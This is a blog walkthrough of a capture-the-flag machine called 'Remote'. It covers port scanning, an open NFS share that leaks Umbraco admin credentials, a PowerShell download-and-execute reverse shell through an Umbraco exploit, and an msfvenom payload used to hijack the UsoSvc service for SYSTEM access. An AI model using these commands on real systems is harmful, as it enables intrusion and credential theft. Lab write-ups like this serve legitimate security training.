REMOTE WRITEUP

NMAP SCANS

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-22 13:36 IST
    NSE: Loaded 151 scripts for scanning.
    NSE: Script Pre-scanning.
    Initiating NSE at 13:36
    Completed NSE at 13:36, 0.00s elapsed
    Initiating NSE at 13:36
    Completed NSE at 13:36, 0.00s elapsed
    Initiating NSE at 13:36
    Completed NSE at 13:36, 0.00s elapsed
    Initiating Ping Scan at 13:36
    Scanning 10.10.10.180 [4 ports]
    Completed Ping Scan at 13:36, 0.37s elapsed (1 total hosts)
    Initiating Parallel DNS resolution of 1 host. at 13:36
    Completed Parallel DNS resolution of 1 host. at 13:36, 0.18s elapsed
    Initiating SYN Stealth Scan at 13:36
    Scanning 10.10.10.180 [1000 ports]
    Discovered open port 80/tcp on 10.10.10.180
    Discovered open port 111/tcp on 10.10.10.180
    Discovered open port 139/tcp on 10.10.10.180
    Discovered open port 135/tcp on 10.10.10.180
    Discovered open port 445/tcp on 10.10.10.180
    Discovered open port 21/tcp on 10.10.10.180
    Discovered open port 2049/tcp on 10.10.10.180
    Completed SYN Stealth Scan at 13:36, 2.35s elapsed (1000 total ports)
    Initiating Service scan at 13:36
    Scanning 7 services on 10.10.10.180
    Completed Service scan at 13:37, 64.48s elapsed (7 services on 1 host)
    Initiating OS detection (try #1) against 10.10.10.180
    Retrying OS detection (try #2) against 10.10.10.180
    Initiating Traceroute at 13:37
    Completed Traceroute at 13:37, 0.43s elapsed
    Initiating Parallel DNS resolution of 2 hosts. at 13:37
    Completed Parallel DNS resolution of 2 hosts. at 13:37, 0.20s elapsed
    NSE: Script scanning 10.10.10.180.
    Initiating NSE at 13:37
    NSE: [ftp-bounce] PORT response: 501 Server cannot accept argument.
    Completed NSE at 13:37, 10.39s elapsed
    Initiating NSE at 13:37
    Completed NSE at 13:38, 69.27s elapsed
    Initiating NSE at 13:38
    Completed NSE at 13:38, 0.00s elapsed
    Nmap scan report for 10.10.10.180
    Host is up (0.29s latency).
    Not shown: 993 closed ports
    PORT     STATE SERVICE       VERSION
    21/tcp   open  ftp           Microsoft ftpd
    |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
    | ftp-syst: 
    |_  SYST: Windows_NT
    80/tcp   open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    | http-methods: 
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-title: Home - Acme Widgets
    111/tcp  open  rpcbind       2-4 (RPC #100000)
    | rpcinfo: 
    |   program version    port/proto  service
    |   100000  2,3,4        111/tcp   rpcbind
    |   100000  2,3,4        111/tcp6  rpcbind
    |   100000  2,3,4        111/udp   rpcbind
    |   100000  2,3,4        111/udp6  rpcbind
    |   100003  2,3         2049/udp   nfs
    |   100003  2,3         2049/udp6  nfs
    |   100003  2,3,4       2049/tcp   nfs
    |   100003  2,3,4       2049/tcp6  nfs
    |   100005  1,2,3       2049/tcp   mountd
    |   100005  1,2,3       2049/tcp6  mountd
    |   100005  1,2,3       2049/udp   mountd
    |   100005  1,2,3       2049/udp6  mountd
    |   100021  1,2,3,4     2049/tcp   nlockmgr
    |   100021  1,2,3,4     2049/tcp6  nlockmgr
    |   100021  1,2,3,4     2049/udp   nlockmgr
    |   100021  1,2,3,4     2049/udp6  nlockmgr
    |   100024  1           2049/tcp   status
    |   100024  1           2049/tcp6  status
    |   100024  1           2049/udp   status
    |_  100024  1           2049/udp6  status
    135/tcp  open  msrpc         Microsoft Windows RPC
    139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
    445/tcp  open  microsoft-ds?
    2049/tcp open  mountd        1-3 (RPC #100005)
    Aggressive OS guesses: Microsoft Windows Vista SP1 (93%), Microsoft Windows Server 2012 (92%), Microsoft Windows Longhorn (92%), Microsoft Windows Server 2012 R2 (91%), Microsoft Windows Server 2012 R2 Update 1 (91%), Microsoft Windows Server 2016 build 10586 - 14393 (91%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (91%), Microsoft Windows 10 1703 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows 7 SP1 (90%)
    No exact OS matches for host (test conditions non-ideal).
    Network Distance: 2 hops
    TCP Sequence Prediction: Difficulty=257 (Good luck!)
    IP ID Sequence Generation: Incremental
    Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

    Host script results:
    |_clock-skew: 4m56s
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled but not required
    | smb2-time: 
    |   date: 2020-06-22T08:12:25
    |_  start_date: N/A

    TRACEROUTE (using port 80/tcp)
    HOP RTT       ADDRESS
    1   427.21 ms 10.10.14.1
    2   427.21 ms 10.10.10.180

    NSE: Script Post-scanning.
    Initiating NSE at 13:38
    Completed NSE at 13:38, 0.00s elapsed
    Initiating NSE at 13:38
    Completed NSE at 13:38, 0.00s elapsed
    Initiating NSE at 13:38
    Completed NSE at 13:38, 0.00s elapsed
    Read data files from: /usr/bin/../share/nmap
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 153.04 seconds
            Raw packets sent: 1282 (57.820KB) | Rcvd: 1205 (49.548KB)

ENUMERATING PORTS

FTP

WEBSITE

lets use gobuster against this

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/remoteC]
    └──╼ #gobuster dir -u http://10.10.10.180/ -w /usr/share/wordlists/dirb/common.txt 
    ===============================================================
    Gobuster v3.0.1
    by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
    ===============================================================
    [+] Url:            http://10.10.10.180/
    [+] Threads:        10
    [+] Wordlist:       /usr/share/wordlists/dirb/common.txt
    [+] Status codes:   200,204,301,302,307,401,403
    [+] User Agent:     gobuster/3.0.1
    [+] Timeout:        10s
    ===============================================================
    2020/06/22 13:56:20 Starting gobuster
    ===============================================================
    /blog (Status: 200)
    /Blog (Status: 200)
    /home (Status: 200)
    /Home (Status: 200)
    /install (Status: 302)
    /intranet (Status: 200)
    /people (Status: 200)
    /People (Status: 200)
    /person (Status: 200)
    /products (Status: 200)
    /Products (Status: 200)
    /umbraco (Status: 200)
    ===============================================================
    2020/06/22 13:59:46 Finished
    ===============================================================

WEBSITE UMBRACO DIRECTORY

but we need username and password for this !!

PORT 111 MOUNT

    ┌─[root@liquid]─[~/Desktop/HTB/remoteC]
    └──╼ #showmount -e 10.10.10.180
    Export list for 10.10.10.180:
    /site_backups (everyone)
    ┌─[root@liquid]─[~/Desktop/HTB/remoteC]
    └──╼ #mount -t nfs 10.10.10.180:/site_backups ./mount
    mount.nfs: mount point ./mount does not exist
    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/remoteC]
    └──╼ #mkdir mount
    ┌─[root@liquid]─[~/Desktop/HTB/remoteC]
    └──╼ #mount -t nfs 10.10.10.180:/site_backups ./mount
    ┌─[root@liquid]─[~/Desktop/HTB/remoteC]
    ──╼ #cd mount
    ┌─[root@liquid]─[~/Desktop/HTB/remoteC/mount]
    └──╼ #ls
    App_Browsers  App_Plugins    bin     css           Global.asax  scripts  Umbraco_Client  Web.config
    App_Data      aspnet_client  Config  default.aspx  Media        Umbraco  Views

Here we will grab our password for umbraco logins

https://our.umbraco.com/forum/getting-started/installing-umbraco/35554-Where-does-Umbraco-store-usernames-and-passwords

adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{“hashAlgorithm”:”SHA1″}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50

admin@htb.local : baconandcheese

GETTING USER ACCESS

Exploit od umbraco

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/remoteC]
    └──╼ #python exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.12:8000/reverseps.ps1')"

Netcat Listener

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/remoteC]
    └──╼ #nc -lnvp 9002
    listening on [any] 9002 ...
    connect to [10.10.14.12] from (UNKNOWN) [10.10.10.180] 49689


    PS C:\windows\temp> whoami 
    iis apppool\defaultapppool
    PS C:\windows\temp> 

lets get cmd first CMD.EXE

┌─[root@liquid]─[~/Desktop/HTB/remoteC]
└──╼ #nc -lnvp 9003
listening on [any] 9003 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.180] 49754
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\windows\temp>whoami \priv
whoami \priv
ERROR: Invalid argument/option - '\priv'.
Type "WHOAMI /?" for usage.

C:\windows\temp>whoami
whoami
iis apppool\defaultapppool

C:\windows\temp>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

C:\windows\temp>sysinfo 
sysinfo
'sysinfo' is not recognized as an internal or external command,
operable program or batch file.

C:\windows\temp>systeminfo
systeminfo

Host Name:                 REMOTE
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00429-00521-62775-AA801
Original Install Date:     2/19/2020, 4:03:29 PM
System Boot Time:          6/22/2020, 2:27:18 AM
System Manufacturer:       VMware, Inc.
System Model:              VMware7,1
System Type:               x64-based PC
Processor(s):              4 Processor(s) Installed.
                           [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [03]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
                           [04]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version:              VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019
Windows Directory:         C:\Windows
System Directory:          C:\Windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory:     4,095 MB
Available Physical Memory: 2,572 MB
Virtual Memory: Max Size:  4,799 MB
Virtual Memory: Available: 3,229 MB
Virtual Memory: In Use:    1,570 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              N/A
Hotfix(s):                 5 Hotfix(s) Installed.
                           [01]: KB4534119
                           [02]: KB4462930
                           [03]: KB4516115
                           [04]: KB4523204
                           [05]: KB4464455
Network Card(s):           1 NIC(s) Installed.
                           [01]: vmxnet3 Ethernet Adapter
                                 Connection Name: Ethernet0 2
                                 DHCP Enabled:    No
                                 IP address(es)
                                 [01]: 10.10.10.180
                                 [02]: fe80::4d8:24d5:55c2:7def
                                 [03]: dead:beef::4d8:24d5:55c2:7def
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

C:\windows\temp>

GETTING ROOT ACCESS

Lets create exe which will get us administrator access

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/remoteC]
    └──╼ #msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.12 lport=9004 -f exe > liquid.exe
        [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
    [-] No arch selected, selecting arch: x86 from the payload
    No encoder or badchars specified, outputting raw payload
    Payload size: 324 bytes
    Final size of exe file: 73802 bytes

Now upload this to temp directory

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/remoteC]
    └──╼ #nc -lnvp 9002
    listening on [any] 9002 ...
    connect to [10.10.14.12] from (UNKNOWN) [10.10.10.180] 49689

    PS C:\windows\system32\inetsrv> cd ../../temp
    PS C:\windows\temp>  invoke-webrequest -Uri http://10.10.14.12:8000/liquid.exe -OutFile liquid.exe

Now here you just have to stop the UsoSvc service then you have to set its path to your own malicious exe which will trigger the exe payload to get you a reverse shell by adminIstrator after starting the service

    ┌─[✗]─[root@liquid]─[~/Desktop/HTB/remoteC]
    └──╼ #nc -lnvp 9003
    listening on [any] 9003 ...
    connect to [10.10.14.12] from (UNKNOWN) [10.10.10.180] 49687
    Microsoft Windows [Version 10.0.17763.107]
    (c) 2018 Microsoft Corporation. All rights reserved.

    C:\windows\temp>dir
    dir
    Volume in drive C has no label.
    Volume Serial Number is BE23-EB3E

    Directory of C:\windows\temp

    06/22/2020  05:06 AM    <DIR>          .
    06/22/2020  05:06 AM    <DIR>          ..
    06/22/2020  03:55 AM    <DIR>          DiagTrack_alternativeTrace
    06/22/2020  03:55 AM    <DIR>          DiagTrack_aot
    06/22/2020  03:55 AM    <DIR>          DiagTrack_diag
    06/22/2020  03:55 AM    <DIR>          DiagTrack_miniTrace
    06/22/2020  05:06 AM            73,802 liquid.exe
    06/22/2020  05:05 AM            91,724 MpCmdRun.log
    02/23/2020  03:20 PM           109,064 MpSigStub.log
    06/22/2020  05:04 AM            45,272 nc.exe
    06/22/2020  04:55 AM               102 silconfig.log
    03/18/2020  04:45 PM    <DIR>          vmware-SYSTEM
    03/18/2020  04:45 PM            27,136 vmware-vmsvc.log
    02/27/2020  10:45 AM            10,823 vmware-vmusr.log
    06/22/2020  04:55 AM               960 vmware-vmvss.log
                8 File(s)        358,883 bytes
                7 Dir(s)  19,409,739,776 bytes free

    C:\windows\temp>sc stop usosvc
    sc stop usosvc

    SERVICE_NAME: usosvc 
            TYPE               : 30  WIN32  
            STATE              : 3  STOP_PENDING 
                                    (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
            WIN32_EXIT_CODE    : 0  (0x0)
            SERVICE_EXIT_CODE  : 0  (0x0)
            CHECKPOINT         : 0x3
            WAIT_HINT          : 0x7530

    C:\windows\temp>sc config usosvc binpath="c:\windows\temp\liquid.exe"
    sc config usosvc binpath="c:\windows\temp\liquid.exe"
    [SC] ChangeServiceConfig SUCCESS

    C:\windows\temp>sc start usosvc
    sc start usosvc
    [SC] StartService FAILED 1053:

    The service did not respond to the start or control request in a timely fashion.


    C:\windows\temp>

Here in netcat we will get our shell

    ┌─[root@liquid]─[~/Desktop/HTB/remoteC]
    └──╼ #nc -lnvp 9004
    listening on [any] 9004 ...
    connect to [10.10.14.12] from (UNKNOWN) [10.10.10.180] 49691
    Microsoft Windows [Version 10.0.17763.107]
    (c) 2018 Microsoft Corporation. All rights reserved.

    C:\Windows\system32>whoami
    whoami
    nt authority\system

    C:\Windows\system32>cd ../../Users/Administrator/Desktop
    cd ../../Users/Administrator/Desktop

    C:\Users\Administrator\Desktop>type root.txt
    type root.txt
    9545907ad***********************

    C:\Users\Administrator\Desktop>cd ../../Public/Desktop
    cd ../../Public/Desktop

    C:\Users\Public\Desktop>dir
    dir
    Volume in drive C has no label.
    Volume Serial Number is BE23-EB3E

    Directory of C:\Users\Public\Desktop

    02/20/2020  03:14 AM             1,191 TeamViewer 7.lnk
                1 File(s)          1,191 bytes
                0 Dir(s)  19,409,514,496 bytes free

    C:\Users\Public\Desktop>cd ..
    cd ..

    C:\Users\Public>dir
    dir
    Volume in drive C has no label.
    Volume Serial Number is BE23-EB3E

    Directory of C:\Users\Public

    02/20/2020  03:42 AM    <DIR>          .
    02/20/2020  03:42 AM    <DIR>          ..
    02/19/2020  04:03 PM    <DIR>          Documents
    09/15/2018  03:19 AM    <DIR>          Downloads
    09/15/2018  03:19 AM    <DIR>          Music
    09/15/2018  03:19 AM    <DIR>          Pictures
    06/22/2020  04:56 AM                34 user.txt
    09/15/2018  03:19 AM    <DIR>          Videos
                1 File(s)             34 bytes
                7 Dir(s)  19,409,514,496 bytes free

    C:\Users\Public>type user.txt
    type user.txt
    0653c**************************

    C:\Users\Public>

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

WordPress.com.

Up ↑

%d bloggers like this: